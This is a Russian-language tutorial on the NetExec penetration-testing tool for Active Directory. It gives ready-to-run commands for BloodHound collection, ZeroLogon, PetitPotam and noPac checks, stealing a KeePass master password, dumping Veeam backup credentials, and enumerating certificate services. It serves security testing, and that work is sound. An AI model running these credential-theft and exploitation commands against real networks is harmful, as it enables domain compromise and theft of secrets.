Netexec
NetExec — это инструмент похожий на CrackMapExec и PsMapExec, который используется для удаленного выполнения команд на целевых машинах, что делает его полезным для тестирования на проникновение (пентестов) и постэксплуатации Active Directory.
Доступные протоколы: smb; ssh; ldap; ftp; wmi; winrm; rdp; vnc; mssql; nfs.
Чтобы просмотреть параметры протокола, выполните:
nxc <protocol> --help
Каждый протокол поддерживает указание целей через: CIDR, IP-адреса, диапазоны IP-адресов, имена хостов, файл, содержащий список целей, или комбинацию всех перечисленных.
netexec <protocol> poudlard.wizard netexec <protocol> 192.168.1.0 192.168.0.2 netexec <protocol> 192.168.1.0/24 netexec <protocol> 192.168.1.0-28 10.0.0.1-67 netexec <protocol> ~/targets.txt
Интерфейс инструмента схож с CrackMapExec о котором можно прочитать в нашей статье. Разберем наиболее интересные возможности этого инструмента, не рассмотренные нами ранее.
Интеграция с BloodHound
NetExec установит пользователя как «подконтрольного» в BloodHound, когда валидная учетная запись будет найдена. Очень полезно, когда модуль lsassy находит 20 учетных данных в одном дампе. Для начала вам нужно настроить файл конфигурации в вашей домашней папке: ~/.nxc/nxc.conf и добавить следующие строки:
[BloodHound] bh_enabled = True bh_uri = 127.0.0.1 bh_port = 7687 bh_user = user bh_pass = pass
Для запуска встроенного сборщика запустите:
nxc ldap <ip> -u user -p pass --bloodhound --collection All
Сканирование на наличие уязвимостей
Проверьте, уязвим ли DC к ZeroLogon:
nxc smb <ip> -u '' -p '' -M zerologon
nxc smb <ip> -u '' -p '' -M petitpotam
nxc smb <ip> -u 'user' -p 'pass' -M nopac
Вы можете проверить, установлен ли keepass на целевом компьютере, а затем украсть мастер-пароль и расшифровать базу данных.
NetExec smb <ip> -u user -p pass -M keepass_discover NetExec smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"
Дамп паролей, используемых Veeam для заданий резервного копирования
Veeam хранит учетные данные сервера и клиента, используемые для заданий резервного копирования, в базе данных SQL. В большинстве конфигураций эта база данных SQL находится в той же системе, что и сервер veeam:
nxc smb 192.168.56.22 -u eddard.stark -p FightP3aceAndHonor! -M veeam
Вывод списка всех серверов подачи заявок PKI:
nxc ldap <ip> -u user -p pass -M adcs
Вывод списка всех сертификатов в PKI:
nxc ldap <ip> -u user -p pass -M adcs -o SERVER=xxxx
Альтернатива ldapsearch. Если вам нужно запросить необработанные значения ldap, вы можете использовать опцию запроса вместе с фильтрами. Возвращаемые значения никак не анализируются и должны возвращать точно такой же вывод, как у ldapsearch или подобных инструментов.
nxc ldap <ip> -u username -p password --query "(sAMAccountName=Administrator)" "" nxc ldap <ip> -u username -p password --query "(sAMAccountName=Administrator)" "sAMAccountName objectClass pwdLastSet"
На этом возможности этого мощного инструмента не заканчиваются, а авторы продолжают добавлять полезный функционал. Более детально изучить инструмент можно по вики.